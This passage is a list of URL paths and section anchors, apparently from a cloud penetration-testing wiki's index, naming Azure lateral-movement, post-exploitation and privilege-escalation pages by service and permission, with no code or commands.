"pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#az---pta---pass-through-authentication","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#authentication-flow","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#az---seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#enumeration","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#pivoting-on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#seamlesspass","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#getting-hashes-of-the-azureadssoacc-account","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#using-silver-tickets-with-firefox","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#on-prem---cloud-via-resource-based-constrained-delegation","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#creating-kerberos-tickets-for-cloud-only-users","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#references","pentesting-cloud/azure-security/az-post-exploitation/index.html#az---post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#azure---ai-foundry-post-exploitation-via-hugging-face-model-namespace-reuse","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#scenario","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#identifying-reusable-namespaces-hf","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#end-to-end-attack-flow-against-azure-ai-foundry","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#post-exploitation-tips-azure-endpoint","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#defensive-guidance-for-azure-ai-foundry-users","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#recognition-heuristics-http","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#cross-references","pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.html#references","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#az---blob-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#storage-privesc","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobsread","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobswrite","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#az---cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsread--microsoftdocumentdbdatabaseaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersread--microsoftdocumentdbdatabaseaccountssqldatabasescontainerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabaseswrite--microsoftdocumentdbdatabaseaccountssqldatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsfailoverprioritychangeaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredprocedureswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredproceduresread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggerswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggersread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionsread--microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabaseswrite--microsoftdocumentdbdatabaseaccountsmongodbdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#az---file-share-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfileswrite-microsoftstoragestorageaccountsfileserviceswritefilebackupsemanticsaction","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#az---function-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#funciton-apps-post-exploitaiton","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#az---key-vault-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#azure-key-vault","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsgetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatespurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysencryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdecryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeyspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretssetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsrestoreaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysrecoveraction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#az---logic-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#logic-apps-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesread-microsoftwebsiteswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesstopaction-microsoftwebsitesstartaction--microsoftwebsitesrestartaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesconfiglistaction-microsoftwebsitesread--microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicintegrationaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsbatchconfigurationswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsmapswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountspartnerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountssessionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsregenerateaccesskeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#az---mysql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#mysql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversdatabaseswrite--microsoftdbformysqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversadvancedthreatprotectionsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversfirewallruleswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversresetgtidaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversupdateconfigurationsaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#az---postgresql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#postgresql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#use-pg_azure_storage-extension-to-access-storage-accounts","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversdatabaseswrite--microsoftdbforpostgresqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingswrite--microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversfirewallruleswrite-microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserversfirewallrulesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversconfigurationswrite--microsoftdbforpostgresqlflexibleserversconfigurationsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#az---queue-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#queue","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#references","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#az---service-bus-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#service-bus","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicssubscriptionsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesqueueswrite-microsoftservicebusnamespacesqueuesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicswrite-microsoftservicebusnamespacestopicsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicssubscriptionswrite-microsoftservicebusnamespacestopicssubscriptionsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-authorizationrules-send--recive-messages","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#references","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#az---table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitiesread","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitieswrite--microsoftstoragestorageaccountstableservicestablesentitiesaddaction--microsoftstoragestorageaccountstableservicestablesentitiesupdateaction","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#az---sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesread-microsoftsqlserversread--microsoftsqlserversdatabaseswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverselasticpoolswrite--microsoftsqlserverselasticpoolsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversauditingsettingsread--microsoftsqlserversauditingsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqllocationsconnectionpoliciesazureasyncoperationread-microsoftsqlserversconnectionpoliciesread--microsoftsqlserversconnectionpolicieswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesexportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesimportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversconnectionpolicieswrite--microsoftsqlserversconnectionpoliciesread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverskeyswrite--microsoftsqlserverskeysread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesledgerdigestuploadsdisableaction-microsoftsqllocationsledgerdigestuploadsazureasyncoperationread-microsoftsqllocationsledgerdigestuploadsoperationresultsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasestransparentdataencryptionwrite-microsoftsqllocationstransparentdataencryptionazureasyncoperationread-microsoftsqlserversdatabasestransparentdataencryptionread","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#virtual-desktop","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#common-techniques","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vms--network","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vm-application-pivoting","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-images","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-restore-points","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-disks--snapshots","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-vm-extensions--vm-applications","pentesting-cloud/azure-security/az-privilege-escalation/index.html#az---privilege-escalation","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#az---azure-iam-privesc-authorization","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#azure-iam","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroledefinitionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationelevateaccessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftmanagedidentityuserassignedidentitiesfederatedidentitycredentialswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#az---app-services-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#app-services","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitespublishaction-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsitesconfigread-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#obtaining-scm-credentials--enabling-basic-authentication","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#publish-code-using-scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#webjobs-microsoftwebsitespublishaction--scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsiteswrite-microsoftwebsitesread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#update-app-code-from-the-source","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfigread-microsoftwebsitesconfiglistaction-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#az---azure-automation-accounts-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#azure-automation-accounts","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#hybrid-workers-group","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsjobswrite-microsoftautomationautomationaccountsrunbooksdraftwrite-microsoftautomationautomationaccountsjobsoutputread-microsoftautomationautomationaccountsrunbookspublishaction-microsoftresourcessubscriptionsresourcegroupsread-microsoftautomationautomationaccountsrunbookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsscheduleswrite-microsoftautomationautomationaccountsjobscheduleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswebhookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsrunbooksdraftwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountssourcecontrolswrite-microsoftautomationautomationaccountssourcecontrolsread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsvariableswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#custom-runtime-environments","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#compromising-state-configuration","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#az---azure-container-registry-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#azure-container-registry","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistcredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestokenswrite-microsoftcontainerregistryregistriesgeneratecredentialsaction-microsoftcontainerregistryregistriesgeneratecredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistbuildsourceuploadurlaction-microsoftcontainerregistryregistriesschedulerunaction-microsoftcontainerregistryregistriesrunslistlogsasurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestaskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriesimportimageaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#az---azure-container-instances-apps--jobs-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#azure-container-instances-apps--jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aci","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsread-microsoftcontainerinstancecontainergroupscontainersexecaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aca","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappsread-microsoftappmanagedenvironmentsread-microsoftappcontainerappsrevisionsreplicas-microsoftappcontainerappsrevisionsread-microsoftappcontainerappsgetauthtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappmanagedenvironmentsread-microsoftappjobswrite-microsoftappmanagedenvironmentsjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsstartaction-microsoftappjobsread","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsrestartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#az---cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountssqlroledefinitionswrite-microsoftdocumentdbdatabaseaccountssqlroledefinitionsread--microsoftdocumentdbdatabaseaccountssqlroleassignmentswrite-microsoftdocumentdbdatabaseaccountssqlroleassignmentsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountsmongodbroledefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbroledefinitionsread-microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbmongoclustersread--microsoftdocumentdbmongoclusterswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbmongoclustersread--microsoftdocumentdbmongoclustersfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#az---entraid-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#roles","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#role-privileged-role-administrator","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#applications","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsmyorganizationcredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#applications-privilege-escalation","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#service-principals","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalssynchronizationcredentialsmanage","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsdisable-and-enable","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#groups",